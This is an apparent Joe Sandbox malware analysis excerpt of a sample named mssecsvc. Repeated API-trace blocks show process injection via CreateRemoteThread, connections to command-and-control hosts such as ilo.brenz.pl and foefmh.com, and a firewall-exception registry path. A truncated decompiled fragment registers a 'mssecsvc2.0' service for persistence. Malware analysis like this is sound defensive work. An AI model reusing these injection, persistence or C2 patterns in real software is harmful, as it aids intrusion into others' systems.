                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountHandleLibraryLoadModuleTick
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2837544101-4180491618
                                                                                • Opcode ID: a6ecbdba0e77da1c42fb1fb22e58a019832077429085a03e12af027fb64ba546
                                                                                • Instruction ID: 5a5eb340fa4b68033d6b5d1c852d35b2d7173fe9669561a3b123735a046d1d28
                                                                                • Opcode Fuzzy Hash: a6ecbdba0e77da1c42fb1fb22e58a019832077429085a03e12af027fb64ba546
                                                                                • Instruction Fuzzy Hash: 2CE12271518258BFEF259F648C4ABEA7BECEF42700F0045A9EC499E082D7F45F4687A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(7FEA3CE5), ref: 7FEA3CF0
                                                                                • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00000104), ref: 7FEA3D07
                                                                                  • Part of subcall function 7FEA3D1F: lstrcat.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,7FEA3D12), ref: 7FEA3D20
                                                                                  • Part of subcall function 7FEA3D1F: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                  • Part of subcall function 7FEA3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                  • Part of subcall function 7FEA3D1F: GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                  • Part of subcall function 7FEA3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 215653160-4180491618
                                                                                • Opcode ID: cd28a5bb51607502b6a1d28e904626137af5b7f109cbf1ae294eaab79654ac09
                                                                                • Instruction ID: 7541589ca8aef85322091197c42534de99d7bca435932005a89768fd23254656
                                                                                • Opcode Fuzzy Hash: cd28a5bb51607502b6a1d28e904626137af5b7f109cbf1ae294eaab79654ac09
                                                                                • Instruction Fuzzy Hash: 4CE1F171409348BFEB229F708C4ABFA7BACEF42304F004559EC4A9E091D6F66F0597A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00B93CE5), ref: 00B93CF0
                                                                                • GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00000104), ref: 00B93D07
                                                                                  • Part of subcall function 00B93D1F: lstrcat.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00B93D12), ref: 00B93D20
                                                                                  • Part of subcall function 00B93D1F: GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                  • Part of subcall function 00B93D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                  • Part of subcall function 00B93D1F: GetTickCount.KERNEL32 ref: 00B93D93
                                                                                  • Part of subcall function 00B93D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 215653160-4180491618
                                                                                • Opcode ID: cd28a5bb51607502b6a1d28e904626137af5b7f109cbf1ae294eaab79654ac09
                                                                                • Instruction ID: f82e2ce4fe6cc6181cfee966d41e6a2f487ea47cc7f754acf2db8160a9078b84
                                                                                • Opcode Fuzzy Hash: cd28a5bb51607502b6a1d28e904626137af5b7f109cbf1ae294eaab79654ac09
                                                                                • Instruction Fuzzy Hash: C3E11271418258BFEF259F648C4ABEA3BECEF42700F0045A9EC499E082D7F45F468765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • lstrcat.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,7FEA3D12), ref: 7FEA3D20
                                                                                  • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                                                                                  • Part of subcall function 7FEA3D36: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                  • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                  • Part of subcall function 7FEA3D36: GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                  • Part of subcall function 7FEA3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2038497427-4180491618
                                                                                • Opcode ID: 5a76be44ed4f92b9dccb11bf418610a86d6d8c7d9316cc10d01e71e8a6162f38
                                                                                • Instruction ID: aa1c8551e8f76fbb525208f0bea2f920101e632125f5267fb1ed65396364aa08
                                                                                • Opcode Fuzzy Hash: 5a76be44ed4f92b9dccb11bf418610a86d6d8c7d9316cc10d01e71e8a6162f38
                                                                                • Instruction Fuzzy Hash: A2E1F071419348BFEB229F748C4ABFA7BACEF42304F004559E84A9E081DAF66F059765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • lstrcat.KERNEL32(C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,00B93D12), ref: 00B93D20
                                                                                  • Part of subcall function 00B93D36: LoadLibraryA.KERNEL32(00B93D2B), ref: 00B93D36
                                                                                  • Part of subcall function 00B93D36: GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
                                                                                  • Part of subcall function 00B93D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
                                                                                  • Part of subcall function 00B93D36: GetTickCount.KERNEL32 ref: 00B93D93
                                                                                  • Part of subcall function 00B93D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 2038497427-4180491618
                                                                                • Opcode ID: 5a76be44ed4f92b9dccb11bf418610a86d6d8c7d9316cc10d01e71e8a6162f38
                                                                                • Instruction ID: 51aea7d4b847c95fae2948d450aaddc5b0c08c45118b9c7d98ec51197e6b56e6
                                                                                • Opcode Fuzzy Hash: 5a76be44ed4f92b9dccb11bf418610a86d6d8c7d9316cc10d01e71e8a6162f38
                                                                                • Instruction Fuzzy Hash: 73E11271918258BFEF259F648C4ABEA3BECEF02700F0045A9EC499E082D7F45F468765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
  • Part of subcall function 7FEA3D4B: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
  • Part of subcall function 7FEA3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
  • Part of subcall function 7FEA3D4B: GetTickCount.KERNEL32 ref: 7FEA3D93
  • Part of subcall function 7FEA3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$AddressCountInformationProcTickVolume
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• API String ID: 3734769084-4180491618
• Opcode ID: 6ab2b3c950b056d37b1ed1d631e5db56a4483ae6f253cbb068636a664c233e13
• Instruction ID: 04a7c8116a9fb35f71bbffa2808c6274a5c5ffd0f068440cbef2dd7623ef1827
• Opcode Fuzzy Hash: 6ab2b3c950b056d37b1ed1d631e5db56a4483ae6f253cbb068636a664c233e13
• Instruction Fuzzy Hash: 9DD10071419348BFEB229F748C4ABFA7BACEF41304F004519E84A9E091DBF66F059765
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(00B93D2B), ref: 00B93D36
  • Part of subcall function 00B93D4B: GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
  • Part of subcall function 00B93D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
  • Part of subcall function 00B93D4B: GetTickCount.KERNEL32 ref: 00B93D93
  • Part of subcall function 00B93D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
Strings
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$AddressCountInformationProcTickVolume
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• API String ID: 3734769084-4180491618
• Opcode ID: 6ab2b3c950b056d37b1ed1d631e5db56a4483ae6f253cbb068636a664c233e13
• Instruction ID: a52d58ca4f311da731e87a8ae5949c8655b0e5e7268b4affabcb93b1af76feb4
• Opcode Fuzzy Hash: 6ab2b3c950b056d37b1ed1d631e5db56a4483ae6f253cbb068636a664c233e13
• Instruction Fuzzy Hash: 86D10F71918258BFEF35AF648C4ABEA3BECEF01700F0045A9E8499E082D7F45F468765
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
• LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
• GetTickCount.KERNEL32 ref: 7FEA3D93
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
• GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 7FEA3EE2
• wsprintfA.USER32 ref: 7FEA3EF7
• CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
• CloseHandle.KERNEL32(?,6EF1083C), ref: 7FEA3F49
• CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
• CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
• socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
• connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
• GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
• wsprintfA.USER32 ref: 7FEA4179
• SetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA42D6
• Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
• ResetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA430A
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• API String ID: 1567941233-4180491618
• Opcode ID: 8f5bda587157e99726d781c634e3378632d432898dcbe4ad85f90d404c80ec81
• Instruction ID: 0fd1af5c82e6ac19fee7a4e27b5b7e3d4aaa516ddc9e53bac77035a7f4224d32
• Opcode Fuzzy Hash: 8f5bda587157e99726d781c634e3378632d432898dcbe4ad85f90d404c80ec81
• Instruction Fuzzy Hash: BBE1EF71419348BFEB229F748C4ABFA7BACEF41304F00465AEC4A9E081D6F66F059761
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,00B93D41), ref: 00B93D4C
• LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B93D5F
• GetTickCount.KERNEL32 ref: 00B93D93
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B96EF6,00000000,00000000,00000000,00000000), ref: 00B93E65
• GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe,000000C8), ref: 00B93EE2
• wsprintfA.USER32 ref: 00B93EF7
• CreateThread.KERNEL32(00000000,00000000,00B93691,00000000,00000000), ref: 00B93F40
• CloseHandle.KERNEL32(?,6EF1083C), ref: 00B93F49
• CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B93FE9
• CloseHandle.KERNEL32(?,00000000), ref: 00B93FF2
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B93FFF
• socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
• connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
• GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
• wsprintfA.USER32 ref: 00B94179
• SetEvent.KERNEL32(000002A0,?,00000000), ref: 00B942D6
• Sleep.KERNEL32(00007530,?,00000000), ref: 00B942F7
• ResetEvent.KERNEL32(000002A0,?,00000000), ref: 00B9430A
Strings
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• API String ID: 1567941233-4180491618
• Opcode ID: 8f5bda587157e99726d781c634e3378632d432898dcbe4ad85f90d404c80ec81
• Instruction ID: f680fbca08bc1336e804d03f005211dc4792c8a6f2568d4fae020b89613d8cc1
• Opcode Fuzzy Hash: 8f5bda587157e99726d781c634e3378632d432898dcbe4ad85f90d404c80ec81
• Instruction Fuzzy Hash: 91E1FE71918258BFEF25AF648C4ABEA3BECEF41700F0045A9EC499E082D7F45F468765
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000), ref: 7FEA04BE
• GetVersion.KERNEL32 ref: 7FEA0500
• VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FEA0528
• CloseHandle.KERNEL32(?), ref: 7FEA05AD
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Handle$AllocCloseModuleVersionVirtual
• String ID: \BaseNamedObjects\reytVt$\BaseNamedObjects\reytVt$csrs
• API String ID: 3017432202-2732440246
• Opcode ID: 1675a9fdbf51ac598faf71083b84e51afed01ab3c173c7fa300afc3e2da58e2b
• Instruction ID: e39f82f75279f079b55252e40bf08981b0556bbd7f8c8fefce01ca585becc201
• Opcode Fuzzy Hash: 1675a9fdbf51ac598faf71083b84e51afed01ab3c173c7fa300afc3e2da58e2b
• Instruction Fuzzy Hash: AEB19D71506349FFEB229F24C849BFA3BA9FF45715F000128EA0A9E181C7F69B45CB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• CloseHandle.KERNEL32(?), ref: 7FEA05AD
• GetModuleHandleA.KERNEL32(7FEA05EC), ref: 7FEA05F2
• lstrcpyW.KERNEL32(\BaseNamedObjects\reytVt,\BaseNamedObjects\reytVt), ref: 7FEA070A
• lstrcpyW.KERNEL32(\BaseNamedObjects\reytVt,?), ref: 7FEA072D
• lstrcatW.KERNEL32(\BaseNamedObjects\reytVt,\reytVt), ref: 7FEA073B
• NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FEA076B
• NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FEA0786
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
• Process32First.KERNEL32 ref: 7FEA07DC
• Process32Next.KERNEL32 ref: 7FEA07ED
• OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
• CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
• CloseHandle.KERNEL32 ref: 7FEA086C
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
• String ID: \BaseNamedObjects\reytVt$\BaseNamedObjects\reytVt$csrs
• API String ID: 1545766225-2732440246
• Opcode ID: 6f9a7df2d700082444de55d317e6829b265054e97730b2f7bba8831fc2cb823c
• Instruction ID: 6bb25a9d95e52be30e4605fb117e034fee3c02357048fedf3e31c310afd2240a
• Opcode Fuzzy Hash: 6f9a7df2d700082444de55d317e6829b265054e97730b2f7bba8831fc2cb823c
• Instruction Fuzzy Hash: 51715D31505205FFEB219F20CC49BBE3BBEEF85715F100068EA0A9E491C7B69F459B59
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
• gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
• socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
• connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
• GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
• wsprintfA.USER32 ref: 7FEA4179
• CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
• CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
• GetTickCount.KERNEL32 ref: 7FEA41F6
• Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA428B
• GetTickCount.KERNEL32 ref: 7FEA4294
• closesocket.WS2_32(6F6C6902), ref: 7FEA42B8
• SetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA42D6
• Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
• ResetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA430A
Strings
Memory Dump Source
• Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
• String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE
• API String ID: 883794535-2519926966
• Opcode ID: 76922eb7f863b4f87123e600b2d48a0325e63692d2b32f1f917fbf14117c4ef4
• Instruction ID: 62042b7e1d70db51705c832b3ce7fc9885254b828fc8a61664828cce23236026
• Opcode Fuzzy Hash: 76922eb7f863b4f87123e600b2d48a0325e63692d2b32f1f917fbf14117c4ef4
• Instruction Fuzzy Hash: AD71EF75508348BAEB229F3488587EEBFAEEF81314F000608E85A9E1D1C7F66F45D761
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B94057
• gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B94066
• socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
• connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
• GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
• wsprintfA.USER32 ref: 00B94179
• CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B941B4
• CloseHandle.KERNEL32(?,00000000,6F6C6902,00B96AA2,00000000,00000000), ref: 00B941BD
• GetTickCount.KERNEL32 ref: 00B941F6
• Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00B96AA2,00000000,00000000), ref: 00B9428B
• GetTickCount.KERNEL32 ref: 00B94294
• closesocket.WS2_32(6F6C6902), ref: 00B942B8
• SetEvent.KERNEL32(000002A0,?,00000000), ref: 00B942D6
• Sleep.KERNEL32(00007530,?,00000000), ref: 00B942F7
• ResetEvent.KERNEL32(000002A0,?,00000000), ref: 00B9430A
Strings
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
• String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE
• API String ID: 883794535-2519926966
• Opcode ID: 76922eb7f863b4f87123e600b2d48a0325e63692d2b32f1f917fbf14117c4ef4
• Instruction ID: c37d60f47d86bb3eecc432c95da2ee5c9310acc6d4db4a8cd5fa269faa92a9fa
• Opcode Fuzzy Hash: 76922eb7f863b4f87123e600b2d48a0325e63692d2b32f1f917fbf14117c4ef4
• Instruction Fuzzy Hash: 3271EB71518258BAEF259F34881DBAE7FEDEF42314F0446A8E85A9E081C3F45F42C765
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemTime.KERNEL32(00B97584), ref: 00B9389F
• Sleep.KERNEL32(0000EA60), ref: 00B93911
• InternetGetConnectedState.WININET(?,00000000), ref: 00B9392A
• gethostbyname.WS2_32(0D278125), ref: 00B9396C
• socket.WS2_32(00000002,00000001,00000000), ref: 00B93981
• ioctlsocket.WS2_32(?,8004667E), ref: 00B9399A
• connect.WS2_32(?,?,00000010), ref: 00B939B3
• Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00B939C1
• closesocket.WS2_32 ref: 00B93A20
Strings
Memory Dump Source
• Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
• String ID: foefmh.com
• API String ID: 159131500-183919301
• Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
• Instruction ID: 8799a771365990f44e40757cebbc09b331dcd43da5050cc57195d8ef07475e06
• Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
• Instruction Fuzzy Hash: 2441AF31604248BAEF219E208C4EBAD7BDEEF85B10F1440A9F94ADE181D7F59F408721
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiler output from the sandbox. The function formats "<module path> -m security"
   (0x70f760 is the buffer that E00408090 fills with GetModuleFileNameA), registers it
   with the Service Control Manager as service "mssecsvc2.0" and starts it. */
E00407C40() {
	char _v260;
	void* _t15;
	void* _t17;

	sprintf( &_v260, "%s -m security", 0x70f760);
	_t15 = OpenSCManagerA(0, 0, 0xf003f);  /* 0xf003f = SC_MANAGER_ALL_ACCESS */
	if(_t15 == 0) {
		return 0;
	} else {
		/* 0xf01ff = SERVICE_ALL_ACCESS, 0x10 = SERVICE_WIN32_OWN_PROCESS,
		   2 = SERVICE_AUTO_START, 1 = SERVICE_ERROR_NORMAL; the binary path is the
		   "-m security" command line built above. */
